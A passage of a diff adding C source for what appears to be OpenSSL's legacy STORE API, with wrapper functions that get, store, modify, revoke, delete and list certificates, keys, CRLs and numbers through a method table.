+    STORE *ret;
+
+    if (method == NULL) {
+        STOREerr(STORE_F_STORE_NEW_METHOD, ERR_R_PASSED_NULL_PARAMETER);
+        return NULL;
+    }
+
+    ret = (STORE *)OPENSSL_malloc(sizeof(STORE));
+    if (ret == NULL) {
+        STOREerr(STORE_F_STORE_NEW_METHOD, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    ret->meth = method;
+
+    CRYPTO_new_ex_data(CRYPTO_EX_INDEX_STORE, ret, &ret->ex_data);
+    if (ret->meth->init && !ret->meth->init(ret)) {
+        STORE_free(ret);
+        ret = NULL;
+    }
+    return ret;
+}
+
+STORE *STORE_new_engine(ENGINE *engine)
+{
+    STORE *ret = NULL;
+    ENGINE *e = engine;
+    const STORE_METHOD *meth = 0;
+
+#ifdef OPENSSL_NO_ENGINE
+    e = NULL;
+#else
+    if (engine) {
+        if (!ENGINE_init(engine)) {
+            STOREerr(STORE_F_STORE_NEW_ENGINE, ERR_R_ENGINE_LIB);
+            return NULL;
+        }
+        e = engine;
+    } else {
+        STOREerr(STORE_F_STORE_NEW_ENGINE, ERR_R_PASSED_NULL_PARAMETER);
+        return NULL;
+    }
+    if (e) {
+        meth = ENGINE_get_STORE(e);
+        if (!meth) {
+            STOREerr(STORE_F_STORE_NEW_ENGINE, ERR_R_ENGINE_LIB);
+            ENGINE_finish(e);
+            return NULL;
+        }
+    }
+#endif
+
+    ret = STORE_new_method(meth);
+    if (ret == NULL) {
+        STOREerr(STORE_F_STORE_NEW_ENGINE, ERR_R_STORE_LIB);
+        return NULL;
+    }
+
+    ret->engine = e;
+
+    return (ret);
+}
+
+void STORE_free(STORE *store)
+{
+    if (store == NULL)
+        return;
+    if (store->meth->clean)
+        store->meth->clean(store);
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_STORE, store, &store->ex_data);
+    OPENSSL_free(store);
+}
+
+int STORE_ctrl(STORE *store, int cmd, long i, void *p, void (*f) (void))
+{
+    if (store == NULL) {
+        STOREerr(STORE_F_STORE_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    if (store->meth->ctrl)
+        return store->meth->ctrl(store, cmd, i, p, f);
+    STOREerr(STORE_F_STORE_CTRL, STORE_R_NO_CONTROL_FUNCTION);
+    return 0;
+}
+
+int STORE_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                           CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func)
+{
+    return CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_STORE, argl, argp,
+                                   new_func, dup_func, free_func);
+}
+
+int STORE_set_ex_data(STORE *r, int idx, void *arg)
+{
+    return (CRYPTO_set_ex_data(&r->ex_data, idx, arg));
+}
+
+void *STORE_get_ex_data(STORE *r, int idx)
+{
+    return (CRYPTO_get_ex_data(&r->ex_data, idx));
+}
+
+const STORE_METHOD *STORE_get_method(STORE *store)
+{
+    return store->meth;
+}
+
+const STORE_METHOD *STORE_set_method(STORE *store, const STORE_METHOD *meth)
+{
+    store->meth = meth;
+    return store->meth;
+}
+
+/* API helpers */
+
+#define check_store(s,fncode,fnname,fnerrcode) \
+        do \
+                { \
+                if ((s) == NULL || (s)->meth == NULL) \
+                        { \
+                        STOREerr((fncode), ERR_R_PASSED_NULL_PARAMETER); \
+                        return 0; \
+                        } \
+                if ((s)->meth->fnname == NULL) \
+                        { \
+                        STOREerr((fncode), (fnerrcode)); \
+                        return 0; \
+                        } \
+                } \
+        while(0)
+
+/* API functions */
+
+X509 *STORE_get_certificate(STORE *s, OPENSSL_ITEM attributes[],
+                            OPENSSL_ITEM parameters[])
+{
+    STORE_OBJECT *object;
+    X509 *x;
+
+    check_store(s, STORE_F_STORE_GET_CERTIFICATE,
+                get_object, STORE_R_NO_GET_OBJECT_FUNCTION);
+
+    object = s->meth->get_object(s, STORE_OBJECT_TYPE_X509_CERTIFICATE,
+                                 attributes, parameters);
+    if (!object || !object->data.x509.certificate) {
+        STOREerr(STORE_F_STORE_GET_CERTIFICATE,
+                 STORE_R_FAILED_GETTING_CERTIFICATE);
+        return 0;
+    }
+    CRYPTO_add(&object->data.x509.certificate->references, 1,
+               CRYPTO_LOCK_X509);
+#ifdef REF_PRINT
+    REF_PRINT("X509", data);
+#endif
+    x = object->data.x509.certificate;
+    STORE_OBJECT_free(object);
+    return x;
+}
+
+int STORE_store_certificate(STORE *s, X509 *data, OPENSSL_ITEM attributes[],
+                            OPENSSL_ITEM parameters[])
+{
+    STORE_OBJECT *object;
+    int i;
+
+    check_store(s, STORE_F_STORE_CERTIFICATE,
+                store_object, STORE_R_NO_STORE_OBJECT_FUNCTION);
+
+    object = STORE_OBJECT_new();
+    if (!object) {
+        STOREerr(STORE_F_STORE_STORE_CERTIFICATE, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    CRYPTO_add(&data->references, 1, CRYPTO_LOCK_X509);
+#ifdef REF_PRINT
+    REF_PRINT("X509", data);
+#endif
+    object->data.x509.certificate = data;
+
+    i = s->meth->store_object(s, STORE_OBJECT_TYPE_X509_CERTIFICATE,
+                              object, attributes, parameters);
+
+    STORE_OBJECT_free(object);
+
+    if (!i) {
+        STOREerr(STORE_F_STORE_STORE_CERTIFICATE,
+                 STORE_R_FAILED_STORING_CERTIFICATE);
+        return 0;
+    }
+    return 1;
+}
+
+int STORE_modify_certificate(STORE *s, OPENSSL_ITEM search_attributes[],
+                             OPENSSL_ITEM add_attributes[],
+                             OPENSSL_ITEM modify_attributes[],
+                             OPENSSL_ITEM delete_attributes[],
+                             OPENSSL_ITEM parameters[])
+{
+    check_store(s, STORE_F_STORE_MODIFY_CERTIFICATE,
+                modify_object, STORE_R_NO_MODIFY_OBJECT_FUNCTION);
+
+    if (!s->meth->modify_object(s, STORE_OBJECT_TYPE_X509_CERTIFICATE,
+                                search_attributes, add_attributes,
+                                modify_attributes, delete_attributes,
+                                parameters)) {
+        STOREerr(STORE_F_STORE_MODIFY_CERTIFICATE,
+                 STORE_R_FAILED_MODIFYING_CERTIFICATE);
+        return 0;
+    }
+    return 1;
+}
+
+int STORE_revoke_certificate(STORE *s, OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[])
+{
+    check_store(s, STORE_F_STORE_REVOKE_CERTIFICATE,
+                revoke_object, STORE_R_NO_REVOKE_OBJECT_FUNCTION);
+
+    if (!s->meth->revoke_object(s, STORE_OBJECT_TYPE_X509_CERTIFICATE,
+                                attributes, parameters)) {
+        STOREerr(STORE_F_STORE_REVOKE_CERTIFICATE,
+                 STORE_R_FAILED_REVOKING_CERTIFICATE);
+        return 0;
+    }
+    return 1;
+}
+
+int STORE_delete_certificate(STORE *s, OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[])
+{
+    check_store(s, STORE_F_STORE_DELETE_CERTIFICATE,
+                delete_object, STORE_R_NO_DELETE_OBJECT_FUNCTION);
+
+    if (!s->meth->delete_object(s, STORE_OBJECT_TYPE_X509_CERTIFICATE,
+                                attributes, parameters)) {
+        STOREerr(STORE_F_STORE_DELETE_CERTIFICATE,
+                 STORE_R_FAILED_DELETING_CERTIFICATE);
+        return 0;
+    }
+    return 1;
+}
+
+void *STORE_list_certificate_start(STORE *s, OPENSSL_ITEM attributes[],
+                                   OPENSSL_ITEM parameters[])
+{
+    void *handle;
+
+    check_store(s, STORE_F_STORE_LIST_CERTIFICATE_START,
+                list_object_start, STORE_R_NO_LIST_OBJECT_START_FUNCTION);
+
+    handle = s->meth->list_object_start(s,
+                                        STORE_OBJECT_TYPE_X509_CERTIFICATE,
+                                        attributes, parameters);
+    if (!handle) {
+        STOREerr(STORE_F_STORE_LIST_CERTIFICATE_START,
+                 STORE_R_FAILED_LISTING_CERTIFICATES);
+        return 0;
+    }
+    return handle;
+}
+
+X509 *STORE_list_certificate_next(STORE *s, void *handle)
+{
+    STORE_OBJECT *object;
+    X509 *x;
+
+    check_store(s, STORE_F_STORE_LIST_CERTIFICATE_NEXT,
+                list_object_next, STORE_R_NO_LIST_OBJECT_NEXT_FUNCTION);
+
+    object = s->meth->list_object_next(s, handle);
+    if (!object || !object->data.x509.certificate) {
+        STOREerr(STORE_F_STORE_LIST_CERTIFICATE_NEXT,
+                 STORE_R_FAILED_LISTING_CERTIFICATES);
+        return 0;
+    }
+    CRYPTO_add(&object->data.x509.certificate->references, 1,
+               CRYPTO_LOCK_X509);
+#ifdef REF_PRINT
+    REF_PRINT("X509", data);
+#endif
+    x = object->data.x509.certificate;
+    STORE_OBJECT_free(object);
+    return x;
+}
+
+int STORE_list_certificate_end(STORE *s, void *handle)
+{
+    check_store(s, STORE_F_STORE_LIST_CERTIFICATE_END,
+                list_object_end, STORE_R_NO_LIST_OBJECT_END_FUNCTION);
+
+    if (!s->meth->list_object_end(s, handle)) {
+        STOREerr(STORE_F_STORE_LIST_CERTIFICATE_END,
+                 STORE_R_FAILED_LISTING_CERTIFICATES);
+        return 0;
+    }
+    return 1;
+}
+
+int STORE_list_certificate_endp(STORE *s, void *handle)
+{
+    check_store(s, STORE_F_STORE_LIST_CERTIFICATE_ENDP,
+                list_object_endp, STORE_R_NO_LIST_OBJECT_ENDP_FUNCTION);
+
+    if (!s->meth->list_object_endp(s, handle)) {
+        STOREerr(STORE_F_STORE_LIST_CERTIFICATE_ENDP,
+                 STORE_R_FAILED_LISTING_CERTIFICATES);
+        return 0;
+    }
+    return 1;
+}
+
+EVP_PKEY *STORE_generate_key(STORE *s, OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[])
+{
+    STORE_OBJECT *object;
+    EVP_PKEY *pkey;
+
+    check_store(s, STORE_F_STORE_GENERATE_KEY,
+                generate_object, STORE_R_NO_GENERATE_OBJECT_FUNCTION);
+
+    object = s->meth->generate_object(s, STORE_OBJECT_TYPE_PRIVATE_KEY,
+                                      attributes, parameters);
+    if (!object || !object->data.key) {
+        STOREerr(STORE_F_STORE_GENERATE_KEY, STORE_R_FAILED_GENERATING_KEY);
+        return 0;
+    }
+    CRYPTO_add(&object->data.key->references, 1, CRYPTO_LOCK_EVP_PKEY);
+#ifdef REF_PRINT
+    REF_PRINT("EVP_PKEY", data);
+#endif
+    pkey = object->data.key;
+    STORE_OBJECT_free(object);
+    return pkey;
+}
+
+EVP_PKEY *STORE_get_private_key(STORE *s, OPENSSL_ITEM attributes[],
+                                OPENSSL_ITEM parameters[])
+{
+    STORE_OBJECT *object;
+    EVP_PKEY *pkey;
+
+    check_store(s, STORE_F_STORE_GET_PRIVATE_KEY,
+                get_object, STORE_R_NO_GET_OBJECT_FUNCTION);
+
+    object = s->meth->get_object(s, STORE_OBJECT_TYPE_PRIVATE_KEY,
+                                 attributes, parameters);
+    if (!object || !object->data.key || !object->data.key) {
+        STOREerr(STORE_F_STORE_GET_PRIVATE_KEY, STORE_R_FAILED_GETTING_KEY);
+        return 0;
+    }
+    CRYPTO_add(&object->data.key->references, 1, CRYPTO_LOCK_EVP_PKEY);
+#ifdef REF_PRINT
+    REF_PRINT("EVP_PKEY", data);
+#endif
+    pkey = object->data.key;
+    STORE_OBJECT_free(object);
+    return pkey;
+}
+
+int STORE_store_private_key(STORE *s, EVP_PKEY *data,
+                            OPENSSL_ITEM attributes[],
+                            OPENSSL_ITEM parameters[])
+{
+    STORE_OBJECT *object;
+    int i;
+
+    check_store(s, STORE_F_STORE_STORE_PRIVATE_KEY,
+                store_object, STORE_R_NO_STORE_OBJECT_FUNCTION);
+
+    object = STORE_OBJECT_new();
+    if (!object) {
+        STOREerr(STORE_F_STORE_STORE_PRIVATE_KEY, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    object->data.key = EVP_PKEY_new();
+    if (!object->data.key) {
+        STOREerr(STORE_F_STORE_STORE_PRIVATE_KEY, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    CRYPTO_add(&data->references, 1, CRYPTO_LOCK_EVP_PKEY);
+#ifdef REF_PRINT
+    REF_PRINT("EVP_PKEY", data);
+#endif
+    object->data.key = data;
+
+    i = s->meth->store_object(s, STORE_OBJECT_TYPE_PRIVATE_KEY, object,
+                              attributes, parameters);
+
+    STORE_OBJECT_free(object);
+
+    if (!i) {
+        STOREerr(STORE_F_STORE_STORE_PRIVATE_KEY, STORE_R_FAILED_STORING_KEY);
+        return 0;
+    }
+    return i;
+}
+
+int STORE_modify_private_key(STORE *s, OPENSSL_ITEM search_attributes[],
+                             OPENSSL_ITEM add_attributes[],
+                             OPENSSL_ITEM modify_attributes[],
+                             OPENSSL_ITEM delete_attributes[],
+                             OPENSSL_ITEM parameters[])
+{
+    check_store(s, STORE_F_STORE_MODIFY_PRIVATE_KEY,
+                modify_object, STORE_R_NO_MODIFY_OBJECT_FUNCTION);
+
+    if (!s->meth->modify_object(s, STORE_OBJECT_TYPE_PRIVATE_KEY,
+                                search_attributes, add_attributes,
+                                modify_attributes, delete_attributes,
+                                parameters)) {
+        STOREerr(STORE_F_STORE_MODIFY_PRIVATE_KEY,
+                 STORE_R_FAILED_MODIFYING_PRIVATE_KEY);
+        return 0;
+    }
+    return 1;
+}
+
+int STORE_revoke_private_key(STORE *s, OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[])
+{
+    int i;
+
+    check_store(s, STORE_F_STORE_REVOKE_PRIVATE_KEY,
+                revoke_object, STORE_R_NO_REVOKE_OBJECT_FUNCTION);
+
+    i = s->meth->revoke_object(s, STORE_OBJECT_TYPE_PRIVATE_KEY,
+                               attributes, parameters);
+
+    if (!i) {
+        STOREerr(STORE_F_STORE_REVOKE_PRIVATE_KEY,
+                 STORE_R_FAILED_REVOKING_KEY);
+        return 0;
+    }
+    return i;
+}
+
+int STORE_delete_private_key(STORE *s, OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[])
+{
+    check_store(s, STORE_F_STORE_DELETE_PRIVATE_KEY,
+                delete_object, STORE_R_NO_DELETE_OBJECT_FUNCTION);
+
+    if (!s->meth->delete_object(s, STORE_OBJECT_TYPE_PRIVATE_KEY,
+                                attributes, parameters)) {
+        STOREerr(STORE_F_STORE_DELETE_PRIVATE_KEY,
+                 STORE_R_FAILED_DELETING_KEY);
+        return 0;
+    }
+    return 1;
+}
+
+void *STORE_list_private_key_start(STORE *s, OPENSSL_ITEM attributes[],
+                                   OPENSSL_ITEM parameters[])
+{
+    void *handle;
+
+    check_store(s, STORE_F_STORE_LIST_PRIVATE_KEY_START,
+                list_object_start, STORE_R_NO_LIST_OBJECT_START_FUNCTION);
+
+    handle = s->meth->list_object_start(s, STORE_OBJECT_TYPE_PRIVATE_KEY,
+                                        attributes, parameters);
+    if (!handle) {
+        STOREerr(STORE_F_STORE_LIST_PRIVATE_KEY_START,
+                 STORE_R_FAILED_LISTING_KEYS);
+        return 0;
+    }
+    return handle;
+}
+
+EVP_PKEY *STORE_list_private_key_next(STORE *s, void *handle)
+{
+    STORE_OBJECT *object;
+    EVP_PKEY *pkey;
+
+    check_store(s, STORE_F_STORE_LIST_PRIVATE_KEY_NEXT,
+                list_object_next, STORE_R_NO_LIST_OBJECT_NEXT_FUNCTION);
+
+    object = s->meth->list_object_next(s, handle);
+    if (!object || !object->data.key || !object->data.key) {
+        STOREerr(STORE_F_STORE_LIST_PRIVATE_KEY_NEXT,
+                 STORE_R_FAILED_LISTING_KEYS);
+        return 0;
+    }
+    CRYPTO_add(&object->data.key->references, 1, CRYPTO_LOCK_EVP_PKEY);
+#ifdef REF_PRINT
+    REF_PRINT("EVP_PKEY", data);
+#endif
+    pkey = object->data.key;
+    STORE_OBJECT_free(object);
+    return pkey;
+}
+
+int STORE_list_private_key_end(STORE *s, void *handle)
+{
+    check_store(s, STORE_F_STORE_LIST_PRIVATE_KEY_END,
+                list_object_end, STORE_R_NO_LIST_OBJECT_END_FUNCTION);
+
+    if (!s->meth->list_object_end(s, handle)) {
+        STOREerr(STORE_F_STORE_LIST_PRIVATE_KEY_END,
+                 STORE_R_FAILED_LISTING_KEYS);
+        return 0;
+    }
+    return 1;
+}
+
+int STORE_list_private_key_endp(STORE *s, void *handle)
+{
+    check_store(s, STORE_F_STORE_LIST_PRIVATE_KEY_ENDP,
+                list_object_endp, STORE_R_NO_LIST_OBJECT_ENDP_FUNCTION);
+
+    if (!s->meth->list_object_endp(s, handle)) {
+        STOREerr(STORE_F_STORE_LIST_PRIVATE_KEY_ENDP,
+                 STORE_R_FAILED_LISTING_KEYS);
+        return 0;
+    }
+    return 1;
+}
+
+EVP_PKEY *STORE_get_public_key(STORE *s, OPENSSL_ITEM attributes[],
+                               OPENSSL_ITEM parameters[])
+{
+    STORE_OBJECT *object;
+    EVP_PKEY *pkey;
+
+    check_store(s, STORE_F_STORE_GET_PUBLIC_KEY,
+                get_object, STORE_R_NO_GET_OBJECT_FUNCTION);
+
+    object = s->meth->get_object(s, STORE_OBJECT_TYPE_PUBLIC_KEY,
+                                 attributes, parameters);
+    if (!object || !object->data.key || !object->data.key) {
+        STOREerr(STORE_F_STORE_GET_PUBLIC_KEY, STORE_R_FAILED_GETTING_KEY);
+        return 0;
+    }
+    CRYPTO_add(&object->data.key->references, 1, CRYPTO_LOCK_EVP_PKEY);
+#ifdef REF_PRINT
+    REF_PRINT("EVP_PKEY", data);
+#endif
+    pkey = object->data.key;
+    STORE_OBJECT_free(object);
+    return pkey;
+}
+
+int STORE_store_public_key(STORE *s, EVP_PKEY *data,
+                           OPENSSL_ITEM attributes[],
+                           OPENSSL_ITEM parameters[])
+{
+    STORE_OBJECT *object;
+    int i;
+
+    check_store(s, STORE_F_STORE_STORE_PUBLIC_KEY,
+                store_object, STORE_R_NO_STORE_OBJECT_FUNCTION);
+
+    object = STORE_OBJECT_new();
+    if (!object) {
+        STOREerr(STORE_F_STORE_STORE_PUBLIC_KEY, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    object->data.key = EVP_PKEY_new();
+    if (!object->data.key) {
+        STOREerr(STORE_F_STORE_STORE_PUBLIC_KEY, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    CRYPTO_add(&data->references, 1, CRYPTO_LOCK_EVP_PKEY);
+#ifdef REF_PRINT
+    REF_PRINT("EVP_PKEY", data);
+#endif
+    object->data.key = data;
+
+    i = s->meth->store_object(s, STORE_OBJECT_TYPE_PUBLIC_KEY, object,
+                              attributes, parameters);
+
+    STORE_OBJECT_free(object);
+
+    if (!i) {
+        STOREerr(STORE_F_STORE_STORE_PUBLIC_KEY, STORE_R_FAILED_STORING_KEY);
+        return 0;
+    }
+    return i;
+}
+
+int STORE_modify_public_key(STORE *s, OPENSSL_ITEM search_attributes[],
+                            OPENSSL_ITEM add_attributes[],
+                            OPENSSL_ITEM modify_attributes[],
+                            OPENSSL_ITEM delete_attributes[],
+                            OPENSSL_ITEM parameters[])
+{
+    check_store(s, STORE_F_STORE_MODIFY_PUBLIC_KEY,
+                modify_object, STORE_R_NO_MODIFY_OBJECT_FUNCTION);
+
+    if (!s->meth->modify_object(s, STORE_OBJECT_TYPE_PUBLIC_KEY,
+                                search_attributes, add_attributes,
+                                modify_attributes, delete_attributes,
+                                parameters)) {
+        STOREerr(STORE_F_STORE_MODIFY_PUBLIC_KEY,
+                 STORE_R_FAILED_MODIFYING_PUBLIC_KEY);
+        return 0;
+    }
+    return 1;
+}
+
+int STORE_revoke_public_key(STORE *s, OPENSSL_ITEM attributes[],
+                            OPENSSL_ITEM parameters[])
+{
+    int i;
+
+    check_store(s, STORE_F_STORE_REVOKE_PUBLIC_KEY,
+                revoke_object, STORE_R_NO_REVOKE_OBJECT_FUNCTION);
+
+    i = s->meth->revoke_object(s, STORE_OBJECT_TYPE_PUBLIC_KEY,
+                               attributes, parameters);
+
+    if (!i) {
+        STOREerr(STORE_F_STORE_REVOKE_PUBLIC_KEY,
+                 STORE_R_FAILED_REVOKING_KEY);
+        return 0;
+    }
+    return i;
+}
+
+int STORE_delete_public_key(STORE *s, OPENSSL_ITEM attributes[],
+                            OPENSSL_ITEM parameters[])
+{
+    check_store(s, STORE_F_STORE_DELETE_PUBLIC_KEY,
+                delete_object, STORE_R_NO_DELETE_OBJECT_FUNCTION);
+
+    if (!s->meth->delete_object(s, STORE_OBJECT_TYPE_PUBLIC_KEY,
+                                attributes, parameters)) {
+        STOREerr(STORE_F_STORE_DELETE_PUBLIC_KEY,
+                 STORE_R_FAILED_DELETING_KEY);
+        return 0;
+    }
+    return 1;
+}
+
+void *STORE_list_public_key_start(STORE *s, OPENSSL_ITEM attributes[],
+                                  OPENSSL_ITEM parameters[])
+{
+    void *handle;
+
+    check_store(s, STORE_F_STORE_LIST_PUBLIC_KEY_START,
+                list_object_start, STORE_R_NO_LIST_OBJECT_START_FUNCTION);
+
+    handle = s->meth->list_object_start(s, STORE_OBJECT_TYPE_PUBLIC_KEY,
+                                        attributes, parameters);
+    if (!handle) {
+        STOREerr(STORE_F_STORE_LIST_PUBLIC_KEY_START,
+                 STORE_R_FAILED_LISTING_KEYS);
+        return 0;
+    }
+    return handle;
+}
+
+EVP_PKEY *STORE_list_public_key_next(STORE *s, void *handle)
+{
+    STORE_OBJECT *object;
+    EVP_PKEY *pkey;
+
+    check_store(s, STORE_F_STORE_LIST_PUBLIC_KEY_NEXT,
+                list_object_next, STORE_R_NO_LIST_OBJECT_NEXT_FUNCTION);
+
+    object = s->meth->list_object_next(s, handle);
+    if (!object || !object->data.key || !object->data.key) {
+        STOREerr(STORE_F_STORE_LIST_PUBLIC_KEY_NEXT,
+                 STORE_R_FAILED_LISTING_KEYS);
+        return 0;
+    }
+    CRYPTO_add(&object->data.key->references, 1, CRYPTO_LOCK_EVP_PKEY);
+#ifdef REF_PRINT
+    REF_PRINT("EVP_PKEY", data);
+#endif
+    pkey = object->data.key;
+    STORE_OBJECT_free(object);
+    return pkey;
+}
+
+int STORE_list_public_key_end(STORE *s, void *handle)
+{
+    check_store(s, STORE_F_STORE_LIST_PUBLIC_KEY_END,
+                list_object_end, STORE_R_NO_LIST_OBJECT_END_FUNCTION);
+
+    if (!s->meth->list_object_end(s, handle)) {
+        STOREerr(STORE_F_STORE_LIST_PUBLIC_KEY_END,
+                 STORE_R_FAILED_LISTING_KEYS);
+        return 0;
+    }
+    return 1;
+}
+
+int STORE_list_public_key_endp(STORE *s, void *handle)
+{
+    check_store(s, STORE_F_STORE_LIST_PUBLIC_KEY_ENDP,
+                list_object_endp, STORE_R_NO_LIST_OBJECT_ENDP_FUNCTION);
+
+    if (!s->meth->list_object_endp(s, handle)) {
+        STOREerr(STORE_F_STORE_LIST_PUBLIC_KEY_ENDP,
+                 STORE_R_FAILED_LISTING_KEYS);
+        return 0;
+    }
+    return 1;
+}
+
+X509_CRL *STORE_generate_crl(STORE *s, OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[])
+{
+    STORE_OBJECT *object;
+    X509_CRL *crl;
+
+    check_store(s, STORE_F_STORE_GENERATE_CRL,
+                generate_object, STORE_R_NO_GENERATE_CRL_FUNCTION);
+
+    object = s->meth->generate_object(s, STORE_OBJECT_TYPE_X509_CRL,
+                                      attributes, parameters);
+    if (!object || !object->data.crl) {
+        STOREerr(STORE_F_STORE_GENERATE_CRL, STORE_R_FAILED_GENERATING_CRL);
+        return 0;
+    }
+    CRYPTO_add(&object->data.crl->references, 1, CRYPTO_LOCK_X509_CRL);
+#ifdef REF_PRINT
+    REF_PRINT("X509_CRL", data);
+#endif
+    crl = object->data.crl;
+    STORE_OBJECT_free(object);
+    return crl;
+}
+
+X509_CRL *STORE_get_crl(STORE *s, OPENSSL_ITEM attributes[],
+                        OPENSSL_ITEM parameters[])
+{
+    STORE_OBJECT *object;
+    X509_CRL *crl;
+
+    check_store(s, STORE_F_STORE_GET_CRL,
+                get_object, STORE_R_NO_GET_OBJECT_FUNCTION);
+
+    object = s->meth->get_object(s, STORE_OBJECT_TYPE_X509_CRL,
+                                 attributes, parameters);
+    if (!object || !object->data.crl) {
+        STOREerr(STORE_F_STORE_GET_CRL, STORE_R_FAILED_GETTING_KEY);
+        return 0;
+    }
+    CRYPTO_add(&object->data.crl->references, 1, CRYPTO_LOCK_X509_CRL);
+#ifdef REF_PRINT
+    REF_PRINT("X509_CRL", data);
+#endif
+    crl = object->data.crl;
+    STORE_OBJECT_free(object);
+    return crl;
+}
+
+int STORE_store_crl(STORE *s, X509_CRL *data, OPENSSL_ITEM attributes[],
+                    OPENSSL_ITEM parameters[])
+{
+    STORE_OBJECT *object;
+    int i;
+
+    check_store(s, STORE_F_STORE_STORE_CRL,
+                store_object, STORE_R_NO_STORE_OBJECT_FUNCTION);
+
+    object = STORE_OBJECT_new();
+    if (!object) {
+        STOREerr(STORE_F_STORE_STORE_CRL, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    CRYPTO_add(&data->references, 1, CRYPTO_LOCK_X509_CRL);
+#ifdef REF_PRINT
+    REF_PRINT("X509_CRL", data);
+#endif
+    object->data.crl = data;
+
+    i = s->meth->store_object(s, STORE_OBJECT_TYPE_X509_CRL, object,
+                              attributes, parameters);
+
+    STORE_OBJECT_free(object);
+
+    if (!i) {
+        STOREerr(STORE_F_STORE_STORE_CRL, STORE_R_FAILED_STORING_KEY);
+        return 0;
+    }
+    return i;
+}
+
+int STORE_modify_crl(STORE *s, OPENSSL_ITEM search_attributes[],
+                     OPENSSL_ITEM add_attributes[],
+                     OPENSSL_ITEM modify_attributes[],
+                     OPENSSL_ITEM delete_attributes[],
+                     OPENSSL_ITEM parameters[])
+{
+    check_store(s, STORE_F_STORE_MODIFY_CRL,
+                modify_object, STORE_R_NO_MODIFY_OBJECT_FUNCTION);
+
+    if (!s->meth->modify_object(s, STORE_OBJECT_TYPE_X509_CRL,
+                                search_attributes, add_attributes,
+                                modify_attributes, delete_attributes,
+                                parameters)) {
+        STOREerr(STORE_F_STORE_MODIFY_CRL, STORE_R_FAILED_MODIFYING_CRL);
+        return 0;
+    }
+    return 1;
+}
+
+int STORE_delete_crl(STORE *s, OPENSSL_ITEM attributes[],
+                     OPENSSL_ITEM parameters[])
+{
+    check_store(s, STORE_F_STORE_DELETE_CRL,
+                delete_object, STORE_R_NO_DELETE_OBJECT_FUNCTION);
+
+    if (!s->meth->delete_object(s, STORE_OBJECT_TYPE_X509_CRL,
+                                attributes, parameters)) {
+        STOREerr(STORE_F_STORE_DELETE_CRL, STORE_R_FAILED_DELETING_KEY);
+        return 0;
+    }
+    return 1;
+}
+
+void *STORE_list_crl_start(STORE *s, OPENSSL_ITEM attributes[],
+                           OPENSSL_ITEM parameters[])
+{
+    void *handle;
+
+    check_store(s, STORE_F_STORE_LIST_CRL_START,
+                list_object_start, STORE_R_NO_LIST_OBJECT_START_FUNCTION);
+
+    handle = s->meth->list_object_start(s, STORE_OBJECT_TYPE_X509_CRL,
+                                        attributes, parameters);
+    if (!handle) {
+        STOREerr(STORE_F_STORE_LIST_CRL_START, STORE_R_FAILED_LISTING_KEYS);
+        return 0;
+    }
+    return handle;
+}
+
+X509_CRL *STORE_list_crl_next(STORE *s, void *handle)
+{
+    STORE_OBJECT *object;
+    X509_CRL *crl;
+
+    check_store(s, STORE_F_STORE_LIST_CRL_NEXT,
+                list_object_next, STORE_R_NO_LIST_OBJECT_NEXT_FUNCTION);
+
+    object = s->meth->list_object_next(s, handle);
+    if (!object || !object->data.crl) {
+        STOREerr(STORE_F_STORE_LIST_CRL_NEXT, STORE_R_FAILED_LISTING_KEYS);
+        return 0;
+    }
+    CRYPTO_add(&object->data.crl->references, 1, CRYPTO_LOCK_X509_CRL);
+#ifdef REF_PRINT
+    REF_PRINT("X509_CRL", data);
+#endif
+    crl = object->data.crl;
+    STORE_OBJECT_free(object);
+    return crl;
+}
+
+int STORE_list_crl_end(STORE *s, void *handle)
+{
+    check_store(s, STORE_F_STORE_LIST_CRL_END,
+                list_object_end, STORE_R_NO_LIST_OBJECT_END_FUNCTION);
+
+    if (!s->meth->list_object_end(s, handle)) {
+        STOREerr(STORE_F_STORE_LIST_CRL_END, STORE_R_FAILED_LISTING_KEYS);
+        return 0;
+    }
+    return 1;
+}
+
+int STORE_list_crl_endp(STORE *s, void *handle)
+{
+    check_store(s, STORE_F_STORE_LIST_CRL_ENDP,
+                list_object_endp, STORE_R_NO_LIST_OBJECT_ENDP_FUNCTION);
+
+    if (!s->meth->list_object_endp(s, handle)) {
+        STOREerr(STORE_F_STORE_LIST_CRL_ENDP, STORE_R_FAILED_LISTING_KEYS);
+        return 0;
+    }
+    return 1;
+}
+
+int STORE_store_number(STORE *s, BIGNUM *data, OPENSSL_ITEM attributes[],
+                       OPENSSL_ITEM parameters[])
+{
+    STORE_OBJECT *object;
+    int i;
+
+    check_store(s, STORE_F_STORE_STORE_NUMBER,
+                store_object, STORE_R_NO_STORE_OBJECT_NUMBER_FUNCTION);
+
+    object = STORE_OBJECT_new();
+    if (!object) {
+        STOREerr(STORE_F_STORE_STORE_NUMBER, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    object->data.number = data;
+
+    i = s->meth->store_object(s, STORE_OBJECT_TYPE_NUMBER, object,
+                              attributes, parameters);
+
+    STORE_OBJECT_free(object);
+
+    if (!i) {
+        STOREerr(STORE_F_STORE_STORE_NUMBER, STORE_R_FAILED_STORING_NUMBER);
+        return 0;
+    }
+    return 1;
+}
+
+int STORE_modify_number(STORE *s, OPENSSL_ITEM search_attributes[],
+                        OPENSSL_ITEM add_attributes[],
+                        OPENSSL_ITEM modify_attributes[],
+                        OPENSSL_ITEM delete_attributes[],
+                        OPENSSL_ITEM parameters[])
+{
+    check_store(s, STORE_F_STORE_MODIFY_NUMBER,
+                modify_object, STORE_R_NO_MODIFY_OBJECT_FUNCTION);
+
